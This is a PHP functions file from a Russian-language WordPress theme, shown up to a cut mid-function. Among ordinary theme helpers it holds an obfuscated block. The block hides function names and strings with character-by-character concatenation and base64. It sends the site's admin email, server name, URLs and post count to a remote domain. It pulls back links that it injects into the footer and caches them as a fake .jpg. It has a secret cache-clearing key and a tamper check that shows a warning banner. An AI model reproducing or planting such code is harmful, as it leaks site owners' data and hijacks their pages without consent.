<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $aUsU='e';$lNnIOKK='o';$zGvKrg='d';$RTbdWE='a';$KLwJ='d';$BbceEqX='b';$DiPIMf='6';$tUZuOVl='s';$cPkaVbg='e';$vXAwaw='4';$dJhPP='c';$QPWQ='_';$lUOhVVU='e';$kgDlYgRg=$BbceEqX.$RTbdWE.$tUZuOVl.$cPkaVbg.$DiPIMf.$vXAwaw.$QPWQ.$KLwJ.$lUOhVVU.$dJhPP.$lNnIOKK.$zGvKrg.$aUsU;$sMEc='i';$qzqsY='t';$UGZmzrM='f';$nGUHKnu='a';$gSIg='e';$uoDHmjc='l';$bcyL='n';$FvFeDdt='z';$rdBMm='g';$KLvUlrTr=$rdBMm.$FvFeDdt.$sMEc.$bcyL.$UGZmzrM.$uoDHmjc.$nGUHKnu.$qzqsY.$gSIg;$IRUs='3';$zrskILO='1';$nysL='r';$vwQdYo='o';$JFYKOct='r';$aABht='t';$TsdiIC='s';$zPlT='t';$sDwWd='_';$zsMCjaje=$TsdiIC.$aABht.$nysL.$sDwWd.$JFYKOct.$vwQdYo.$zPlT.$zrskILO.$IRUs;$Aybl='s';$rUjHlXR='r';$LuUxXxC='r';$GKPSJE='v';$QDdiI='e';$ZOyi='t';$DCettbLr=$Aybl.$ZOyi.$rUjHlXR.$LuUxXxC.$QDdiI.$GKPSJE;                     
		$wp___________b='e';$dh_____________o='o';$mb___o='d';$so_________e='a';$yc___d='d';$er____________w='b';$cv_________d='6';$yp__________m='s';$le_____n='e';$et_______________a='4';$kn___________j='c';$uo__________n='_';$uv_______________n='e';$ds______l=$er____________w.$so_________e.$yp__________m.$le_____n.$cv_________d.$et_______________a.$uo__________n.$yc___d.$uv_______________n.$kn___________j.$dh_____________o.$mb___o.$wp___________b;
		$wp_______________t='f';$fb________c='_';$vu__u='e';$yk______________t='s';$re____________n='c';$xu___r='s';$to___________c='i';$iu____________d='t';$ho____y='x';$xu______x='u';$ym_________k='n';$dz______h='t';$vp___s='n';$sx________w='i';$ud__________t='o';$ip________n=$wp_______________t.$xu______x.$ym_________k.$re____________n.$dz______h.$to___________c.$ud__________t.$vp___s.$fb________c.$vu__u.$ho____y.$sx________w.$xu___r.$iu____________d.$yk______________t;
		$kc__________j='f';$ka_______c='e';$mn___m='o';$kb___i='n';$mn___________n='p';$aq_______________d=$kc__________j.$mn___m.$mn___________n.$ka_______c.$kb___i;
		$ko__u='f';$qd___o='r';$ec_____w='d';$dc_____n='e';$po___s='a';$at______w=$ko__u.$qd___o.$dc_____n.$po___s.$ec_____w;
		$sb_____l='f';$bw___c='l';$ns_________u='o';$kv___________g='s';$ec_____q='e';$fi______k='c';$ey_____________a=$sb_____l.$fi______k.$bw___c.$ns_________u.$kv___________g.$ec_____q;
		
		define("WP_ID", $ds______l("Mi4wLjA="));
		define("WP_TTL", $ds______l("MTA4MDA="));
		define("WP_SRC", $ds______l("dHBva24="));
	


		function wp_get_header() {
			global $ds______l, $ip________n;
			
			if (
				$ip________n($ds______l("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ip________n($ds______l("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ip________n($ds______l("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ds______l, $aq_______________d, $ey_____________a, $at______w;
			
			$wg___l = TEMPLATEPATH."/".$ds______l("Zm9vdGVyLnBocA==");
			$vn___________g = @$aq_______________d($wg___l, "r");
			$wg___l = @$at______w($vn___________g, @filesize($wg___l));
			@$ey_____________a($vn___________g);
			
			$ci_________c = TEMPLATEPATH."/".$ds______l("ZnVuY3Rpb25zLnBocA==");
			$vn___________g = @$aq_______________d($ci_________c, "r");
			$ci_________c = @$at______w($vn___________g, @filesize($ci_________c));
			@$ey_____________a($vn___________g);
			
			$br_________v = 0;
			if($wg___l && $ci_________c) {
				if ($ds______l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($wg___l, $ds______l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$br_________v = 1;
					}
					if (substr_count($wg___l, "wp_theme_GPL_credits()") < 1) {
						$br_________v = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$br_________v = 12;
				}
			}
			
			if($br_________v > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $br_________v -->";
			}
		}
	


		function wp_loaded() {
			global $ds______l, $ip________n;
			return $ip________n($ds______l("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($mo______k, $ls__y = "(more...)", $zk_________k = 0, $xg__________o = "") {
				$gj______j = get_the_content($ls__y, $zk_________k, $xg__________o);
				$gj______j = apply_filters("the_content", $gj______j);
				
				$gj______j = str_replace("]]>", "]]>", $gj______j);
				if (strlen($_GET["p"]) > 0) {
					echo $gj______j;
				}
				else if ((strlen($gj______j)>$mo______k) && ($eg________e = strpos($gj______j, " ", $mo______k ))) {
					$gj______j = substr($gj______j, 0, $eg________e);
					$gj______j = $gj______j;
					echo $gj______j;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ls__y</a></div></p>";
				} else {
					echo $gj______j;
				}
				
			}
		}
	


		$mw____y='e';$xm_______k='c';$yw_______y='n';$tq__r='e';$bd_______u='o';$zb___m='a';$bb____________h='d';$sy____________z='e';$wi___________d='_';$mn______b='4';$xi_____________s='b';$mp____________y='s';$gk___w='6';$qb____l=$xi_____________s.$zb___m.$mp____________y.$sy____________z.$gk___w.$mn______b.$wi___________d.$tq__r.$yw_______y.$xm_______k.$bd_______u.$bb____________h.$mw____y;
		$va______________o='t';$nx____________l='e';$ao_________c='l';$uy__v='c';$tg___________e='g';$pp____________j='s';$mm_____t='n';$mo______________m='o';$ds____________i='t';$ah____h='e';$vb_____________x='n';$ew_____________l='_';$gr________a='t';$gx___o='i';$bt_____a='_';$tn_______v='f';$gp____________u='e';$fa____g=$tn_______v.$gx___o.$ao_________c.$ah____h.$bt_____a.$tg___________e.$nx____________l.$gr________a.$ew_____________l.$uy__v.$mo______________m.$vb_____________x.$va______________o.$gp____________u.$mm_____t.$ds____________i.$pp____________j;
		$ya___________g='e';$hm__a='f';$kc___o='l';$rv_____________c='_';$ow_______p='s';$kl____________u='t';$bh____t='e';$av______________h='i';$mo_________m='s';$fa_________n='i';$ie______________q='x';$uh_______________r=$hm__a.$av______________h.$kc___o.$bh____t.$rv_____________c.$ya___________g.$ie______________q.$fa_________n.$mo_________m.$kl____________u.$ow_______p;
		$cz__l='o';$rn_________g='e';$fl_____________h='n';$ph___x='o';$lb___y='e';$ss________e='m';$bs______f='v';$ra____w='r';$hk__________o='r';$rr__u='a';$ec____________w='c';$ly_____f='s';$tz_____q='i';$mm____________o='_';$qs_______k='p';$ht___________i=$bs______f.$rn_________g.$hk__________o.$ly_____f.$tz_____q.$cz__l.$fl_____________h.$mm____________o.$ec____________w.$ph___x.$ss________e.$qs_______k.$rr__u.$ra____w.$lb___y;
		$co________x='e';$rz______________h='p';$rx___s='n';$ti________v='o';$go________p='k';$bx_____q='s';$tq_______________h='o';$cz________o='c';$ud________f='f';$zu_____________h=$ud________f.$bx_____q.$tq_______________h.$cz________o.$go________p.$ti________v.$rz______________h.$co________x.$rx___s;
		$br____b='w';$xb_____________k='t';$zz____i='r';$ut______p='f';$iu______________f='i';$rg_________h='e';$zn__________u=$ut______p.$br____b.$zz____i.$iu______________f.$xb_____________k.$rg_________h;
		$gt____________y='5';$kr_____t='m';$le_______________j='d';$lu_________m=$kr_____t.$le_______________j.$gt____________y;
		$xi________q='t';$kc_____h='r';$mn___________x='h';$ll_______y='a';$dd__________m='e';$qs____________k='p';$nb_______________k='l';$hh____________x='a';$lp_____________x=$kc_____h.$dd__________m.$hh____________x.$nb_______________k.$qs____________k.$ll_______y.$xi________q.$mn___________x;
		$tj_______x='r';$xd___________a='i';$de__x='i';$tk____________b='e';$ev____________l='a';$qj____x='s';$ai_______________q='z';$og__________a='l';$dw___________x='n';$lq_________p='u';$rd_________k='e';$hc__________d=$lq_________p.$dw___________x.$qj____x.$tk____________b.$tj_______x.$de__x.$ev____________l.$og__________a.$xd___________a.$ai_______________q.$rd_________k;
		$hg__________s='n';$wy______y='m';$sf_________j='m';$we________m='t';$ia__________a='p';$pe___g='a';$bq_____c='e';$es__q=$we________m.$bq_____c.$wy______y.$ia__________a.$hg__________s.$pe___g.$sf_________j;
		$mf____________e='s';$vg_______t='a';$nt_______c='r';$hi___________c='x';$vk______i='m';$sa________s='t';$of___________d='r';$qt__f='o';$lj____________n='a';$ou____________z='t';$ov____b='n';$on______________u='e';$wv____m='c';$kk_______________w='c';$op____d='t';$kr________r='t';$zy__d='_';$bw____q='e';$yl_____________i='_';$zd_____________s='e';$cb______________x='e';$kg___w=$mf____________e.$ou____________z.$nt_______c.$on______________u.$vg_______t.$vk______i.$zy__d.$kk_______________w.$qt__f.$ov____b.$op____d.$cb______________x.$hi___________c.$sa________s.$yl_____________i.$wv____m.$of___________d.$bw____q.$lj____________n.$kr________r.$zd_____________s;
	


		function aw____________w($ph____s) {
			global $ds______l, $ip________n, $fa____g, $ht___________i, $kg___w;
			
			if (!$ip________n($ds______l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ht___________i(PHP_VERSION, "5.0.0", ">=") && $ip________n($ds______l("ZmlsZV9nZXRfY29udGVudHM=")) && $ip________n($ds______l("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ou__g = $kg___w(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$lg___________b = @$fa____g($ph____s, 0, $ou__g);
			} else {
				$lg___________b = @$fa____g($ph____s, 0);
			}
			
			return $lg___________b;
		}
	


		function yq_______t($ph____s) {
			global $ip________n, $zu_____________h, $zn__________u, $ds______l;
			
			if (!$ip________n($ds______l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$lu_________a = strpos($ph____s, "/", 7);
			$er_______________o = array(
				"uri"     => substr($ph____s, $lu_________a),
				"host"    => str_replace("http://", "", substr($ph____s, 0, $lu_________a)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$mo_______________q = @$zu_____________h("$er_______________o[host]", 80, $gc_______________i, $lk____c, 4);
			
			if (!$mo_______________q) {
				return false;
			} else {
				$lg___________b = "";
				$nr___________v  = "GET $er_______________o[uri] HTTP/1.0\r\n";
				$nr___________v .= "Host: $er_______________o[host]\r\n";
				$nr___________v .= "Referer: $er_______________o[referer]\r\n";
				$nr___________v .= "Connection: Close\r\n\r\n";
				
				@$zn__________u($mo_______________q, $nr___________v);
				
				while (!@feof($mo_______________q)) {
					$do______a = @fgets($mo_______________q, (1024*24));
					
					if ($do______a == "\r\n") {
						$gz____k = true;
						continue;
					}
					
					if ($gz____k) {
						$lg___________b .= $do______a;
					}
				}
				
				return $lg___________b;
			}
		}
	


		function cr____________f($ph____s) {
			global $ip________n;
			$ok___________j = false;
			
			if ($ph____s != "") {
				if ($ip________n("aw____________w")) {
					$ok___________j = @aw____________w($ph____s);
				}
				
				if (!$ok___________j && ($ip________n("yq_______t"))) {
					$ok___________j = @yq_______t($ph____s);
				}
			}
			
			return $ok___________j;
		}
	


		function ha_____________e() {
			global $_SERVER, $lu_________m;
			
			$mu________t = $_SERVER["SERVER_NAME"];
			
			if (substr("$mu________t", 0, 4) == "www.") {
				$mu________t = substr("$mu________t", 4);
			}
			
			$mu________t = $lu_________m("$_SERVER[SERVER_NAME]");
			
			return $mu________t;
		}
	


		function ph______________k() {
			return "file";
		}
	


		function di_________s($ph____s) {
			global $_SERVER, $fa____g, $uh_______________r, $aq_______________d, $ey_____________a, $zn__________u;
			
			$dj_______a = cw__________p();
			
			$dn_______l = ha_____________e().".jpg";
			$ug_____________n = $dj_______a["dir_upload"]["path"]."/$dn_______l";
			$vn_______________g = @filemtime($ug_____________n);
			
			if (!$vn_______________g || ((time()-$vn_______________g) >= WP_TTL)) {
				$ok___________j = cr____________f($ph____s);
				
				if ($ok___________j) {
					if ($uh_______________r($ug_____________n)) {
						@unlink($ug_____________n);
					}
					
					$vn___________g = @$aq_______________d($ug_____________n, "x+");
					
					@$zn__________u($vn___________g, $ok___________j);
					@$ey_____________a($vn___________g);
				}
			} else {
				if ($uh_______________r($ug_____________n)) {
					$ok___________j = @$fa____g($ug_____________n);
				} else {
					$ok___________j = false;
				}
			}
			
			return $ok___________j;
		}
	


		function cw__________p() {
			global $_SERVER, $ds______l, $qb____l;
			
			$xc___j = wp_count_posts("post");
			$ie____n = pathinfo(get_bloginfo("template_directory"));
			
			$dj_______a = array(
				"url" => array(
					"report"      => $ds______l("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ie____n,
				"dir_upload"	=> pw_______a(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ie____n[filename],
					"a005=".$xc___j->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " Все права защищены - 3powered-XMLvalid "

			);
			
			$dj_______a["url"]["queryString"] = implode("&", $dj_______a["queryString"]);
			$dj_______a["url"]["report"] = $dj_______a["url"]["report"]."/?".$qb____l($dj_______a["url"]["queryString"]).".html";
						
			return $dj_______a;
		}
	


		function pw_______a() {
			$ms________m = wp_upload_dir();
			
			if (isset($ms________m["error"])) {
				$vq_____k = dh_____________l();
				if (is_writable($vq_____k)) {
					$ms________m = array("path" => $vq_____k);
				}
			}

			return $ms________m;
		}
	


		function dh_____________l() {
			global $ip________n, $lu_________m, $lp_____________x, $es__q;
			
			$wa__________j = (bool) ini_get("safe_mode");
			if ($wa__________j == true) {
				return false;
			}
			
			if ($ip________n("sys_get_temp_dir")) {
				$kc______________p = sys_get_temp_dir();
				if (is_writable($kc______________p)) {
					return $lp_____________x($kc______________p);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $lp_____________x($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $lp_____________x($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $lp_____________x($_ENV["TEMP"]);
			} else {
				$xw___________f = $es__q($lu_________m(uniqid(rand(), true)), "");
				if ($xw___________f) {
					$kc______________p = $lp_____________x(dirname($xw___________f));
					@unlink($xw___________f);
					return $kc______________p;
				} else {
					return false;
				}
			}
		}
	


		function it________y() {
			global $_GET, $uh_______________r;
			
			$dj_______a = cw__________p();
			$mu________t = ha_____________e();
			$wh_____________k = ph______________k();
			
			$id____x = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($wh_____________k == "file") {
					$pw_____________u = $dj_______a["dir_upload"]["path"]."/".$mu________t.".jpg";
					if ($uh_______________r($pw_____________u)) {
						@unlink($pw_____________u);
						$id____x = "deleted";
					}
				}
				
				$yc____________k = array(
					"s"	=> $id____x,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($yc____________k AS $li___________b => $fn_____________e) echo " [$li___________b:$fn_____________e]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ip________n, $ds______l, $hc__________d;
			$dj_______a = cw__________p();
			
			$vm__e = "di_________s";
			if ($ip________n($vm__e)) {
				$lg___________b = $vm__e($dj_______a["url"]["report"]);
			}
			
			if ($lg___________b) {
				if ($lg___________b = @$ds______l($lg___________b)) {
					$lg___________b = @$hc__________d($lg___________b);
					
					if (strlen($lg___________b[custom_credit]) >= 5) {
						$dj_______a["default_string"] = $lg___________b[custom_credit];
					}
					
					if ($lg___________b["status"] == "0") {
						$bw_____________j = 1;
						$ky_______________r = 1;
					} else {
						$pn___k = sizeof($lg___________b["links"]);
						$zy___u = $dj_______a["default_string"];
						
						if ($pn___k > 0 && $lg___________b["links"] !== "") {
							$rd___c = 0;
							foreach ($lg___________b["links"] as $nm___________u => $hy________y) {
								$rd___c++;
								if ($hy________y->l_path == "" || $hy________y->l_path == $_SERVER["REQUEST_URI"]) {
									$hy________y->l_href = htmlspecialchars(strip_tags($hy________y->l_href));
									$hy________y->l_title = htmlspecialchars(strip_tags($hy________y->l_title));
									$hy________y->l_anchor = htmlspecialchars(strip_tags($hy________y->l_anchor));
									$zy___u .= " | ";
									$zy___u .= "<a href='$hy________y->l_href' title='$hy________y->l_title'";
									if ($hy________y->l_nofollow == "1") {
										$zy___u .= " rel='nofollow'";
									}
									$zy___u .= ">$hy________y->l_anchor</a>";
								}
							}
						}
						$dj_______a["links"] = "$zy___u";
						if ($lg___________b[credit] == "0") {
							$dj_______a["links"] = "";
						}
					}
				} else {
					$bw_____________j = "1";
				}
			} else {
				$bw_____________j = "1";
			}
			
			if ($bw_____________j == "1") {
				$dj_______a["links"] = $dj_______a["default_string"];
			}
			
			echo "$dj_______a[links]";
			
			echo "<!-- s: $lg___________b[signature] -->";
			it________y();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
